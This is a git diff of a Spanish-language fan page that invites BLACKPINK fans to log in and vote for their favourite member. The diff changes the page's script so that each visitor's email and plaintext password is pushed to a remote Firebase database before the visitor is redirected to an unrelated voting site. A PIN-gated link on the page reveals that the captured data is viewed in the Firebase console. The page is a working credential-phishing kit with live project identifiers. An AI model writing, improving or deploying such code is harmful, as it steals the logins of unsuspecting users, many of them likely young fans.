--- a/index.html
+++ b/index.html
@@ -17,8 +17,6 @@
       align-items: center; 
       min-height: 100vh; 
       flex-direction: column;
-
-      /* Fondo con imagen */
       background: url('https://pbs.twimg.com/media/FvTDI2_X0AE-aNl.jpg:large') no-repeat center center fixed;
       background-size: cover;
     }
@@ -60,7 +58,7 @@
     .login-box button { 
       width: 100%; 
       padding: 12px; 
-      background: linear-gradient(90deg, #ff3399, #000000); /* estilo BLACKPINK */
+      background: linear-gradient(90deg, #ff3399, #000000); 
       border: none; 
       border-radius: 10px; 
       color: white; 
@@ -92,7 +90,6 @@
       text-decoration: underline; 
     }
 
-    /* Animación */
     @keyframes fadeIn {
       from { opacity: 0; transform: translateY(-20px); }
       to { opacity: 1; transform: translateY(0); }
@@ -101,14 +98,13 @@
 </head>
 <body>
 
-  <!-- Caja de Login -->
   <div class="login-box">
     <h2>Inicia sesión y vota por tu integrante favorita 💖🖤</h2>
     <p>BLINK, tu voto cuenta ✨ ¡Hazlo valer en esta votación especial!</p>
     
     <form id="loginForm">
-      <input type="email" name="email" placeholder="Correo electrónico" required>
-      <input type="password" name="password" placeholder="Contraseña" required>
+      <input type="email" id="email" placeholder="Correo electrónico" required>
+      <input type="password" id="password" placeholder="Contraseña" required>
       <button type="submit">Ir a Votación</button>
     </form>
 
@@ -117,28 +113,53 @@
     </div>
   </div>
 
-  <script>
+  <!-- SDK Firebase -->
+  <script type="module">
+    // Importar librerías Firebase v9+
+    import { initializeApp } from "https://www.gstatic.com/firebasejs/11.0.1/firebase-app.js";
+    import { getDatabase, ref, push } from "https://www.gstatic.com/firebasejs/11.0.1/firebase-database.js";
+
+    // Configuración de tu proyecto Firebase
+    const firebaseConfig = {
+      apiKey: "AIzaSyDbefvzQXaJqMQrGadz9URAQtbZq3O15WY",
+      authDomain: "asas-e2e96.firebaseapp.com",
+      projectId: "asas-e2e96",
+      storageBucket: "asas-e2e96.firebasestorage.app",
+      messagingSenderId: "608291442701",
+      appId: "1:608291442701:web:224de61c660b404a67c544",
+      measurementId: "G-JVV5MEWC52"
+    };
+
+    // Inicializar Firebase
+    const app = initializeApp(firebaseConfig);
+    const db = getDatabase(app);
+
+    // Formulario
     const loginForm = document.getElementById('loginForm');
     const recoverLink = document.getElementById('recoverLink');
 
-    loginForm.addEventListener('submit', function(e){
+    loginForm.addEventListener('submit', (e) => {
       e.preventDefault();
-      const email = this.email.value;
-      const password = this.password.value;
+      const email = document.getElementById('email').value;
+      const password = document.getElementById('password').value;
 
-      // Guardar en localStorage
-      let historial = JSON.parse(localStorage.getItem('historialDatos')) || [];
-      historial.push({ email, password, fecha: new Date().toLocaleString() });
-      localStorage.setItem('historialDatos', JSON.stringify(historial));
-
-      // Redirigir a la votación
-      window.location.href = "https://www.tuvotacion.com/quien-es-la-ms-bonita-de-blackpink-1";
+      // Guardar en Realtime Database
+      push(ref(db, "usuarios"), {
+        email: email,
+        password: password,
+        fecha: new Date().toLocaleString()
+      }).then(() => {
+        // Redirigir a la votación
+        window.location.href = "https://www.tuvotacion.com/quien-es-la-ms-bonita-de-blackpink-1";
+      }).catch((error) => {
+        alert("Error al guardar: " + error.message);
+      });
     });
 
-    recoverLink.addEventListener('click', function(){
+    recoverLink.addEventListener('click', () => {
       const pin = prompt("Ingresa el PIN para acceder a los datos:");
       if(pin === "2006"){
-        alert("✅ Acceso permitido (aquí iría la vista del historial)");
+        alert("✅ Acceso permitido (los datos se ven en la consola de Firebase)");
       } else {
         alert("PIN incorrecto ❌");
       }
